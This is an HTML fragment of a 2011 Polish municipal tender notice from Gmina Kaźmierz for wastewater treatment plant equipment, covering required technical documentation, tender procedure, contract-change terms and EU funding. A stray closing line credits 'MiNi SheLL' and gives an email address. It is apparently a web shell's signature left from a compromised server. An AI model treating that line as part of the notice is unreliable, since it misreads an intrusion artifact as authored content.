4.  Z3 Zblokowana oczyszczalnia mechaniczna  
-nazwa i typ producenta
-karta katalogowa
- wykonanie materiałowe
- opis sita, sposobu umiejscowienia kosz cedzącego, średnica, perforacja
- sposób transportu skratek, 
- sposób czyszczenie sita, rozwiązanie materiałowe  szczotki , sposób montowania szczotki
- opis komory pomiarowo-przelewowej 
- pomiar poziomu ścieków 
- opis rynny zrzutowej odwodnionych skratek 
- opis szafy sterowniczej, sposób sterowania 
- opis piaskownika, zgarniacza piasku, sprawność usuwania piasku
- opis płuczki piasku
- rysunek montażowy urządzenia
- wytyczne branżowe
5.  Z4 Zgarniacze w osadnikach wtórnych ( komplet z elementem wlotu i wylotu z   osadników wykonanego ze stali nierdzewnej) 
- nazwa i typ producenta
- karta katalogowa
- rozwiązanie materiałowe
- opis układu zgarniania, odbioru, napędy
- rysunek montażowy

6. Z5 Prasa odwadniająca filtracyjna taśmowa 
- nazwa i typ producenta
- karta katalogowa
- opis działania prasy
- rozwiązanie materiałowe
- rozwiązanie technologiczne prasy, zagęszczacza, stacji przygotowania polielektrolitu (sterowanie)
- opis pomp osadu, polielektrolitu, sterowanie
- opis płukania taśmy prasy, regulacji jej położenia, systemu naciągu
- rysunek montażowy

7. Z6  Zestaw do higienizacji z przenośnikami   
 - nazwa i typ producenta,
- karta katalogowa,
- zestawienie urządzeń, rozwiązanie materiałowe
- opis sterowania
- rysunek montażowy

8.  Pompy:
-        nazwa i typ producenta pomp, sterownika, przetwornicy częstotliwości,
-        karta katalogowa,
-        wydajność,
-        wysokość podnoszenia,
-        moc,
-        charakterystyka pracy,
-        poziom hałasu,
-        wymiary, masa, rozwiązanie materiałowe
-        rodzaj uszczelnień
9. Dmuchawy:
-        nazwa i typ producenta,
-        karta katalogowa,
-        wydajność,
-        moc,
-        poziom hałasu,
-        sposób przenoszenia napędu,
-        wymiary, masa, rozwiązania materiałowe
10. Mieszadła, armatura, przepustnice
-	nazwa i typ producenta,
-	karta katalogowa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) wystąpi konieczność wykonania zamówienia dodatkowego w rozumieniu art. 67 ust.            1 pkt 5, którego realizacja będzie miała wpływ na harmonogram  i termin wykonania przedmiotu umowy 
2) wystąpią nieprzewidziane warunki realizacji, tj. warunki gruntowo - wodne będą inne niż w dokumentacji geologiczno - inżynierskiej lub gdy nastąpi odkrycie nie zinwentaryzowanych obiektów archeologicznych i elementów instalacji podziemnej; wystąpią warunki atmosferyczne uniemożliwiające realizacje przedmiotu umowy wg planowanego terminu
3) w przypadku nieterminowego przekazania placu budowy przez Zamawiającego,                    a opóźnienie to ma wpływ na terminowe wykonanie przedmiotu umowy 
     4) wystąpi konieczność zmiany osób o których mowa w § 4 umowy.
     5) ulegnie zmianie urzędowa stawka podatku VAT na roboty budowlane
     6) zajdzie konieczność wprowadzenia zmian w dokumentacji projektowej, co spowoduje konieczność zmiany terminu wykonania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kazmierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kaźmierz
64-530 Kaźmierz
ul. Szamotulska 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2011 godzina 11:00, miejsce: Urząd Gminy Kaźmierz
64-530 Kaźmierz
ul. Szamotulska 20
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Priorytet III. Środowisko przyrodnicze, Działanie 3.4 Gospodarka wodno-ściekowa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com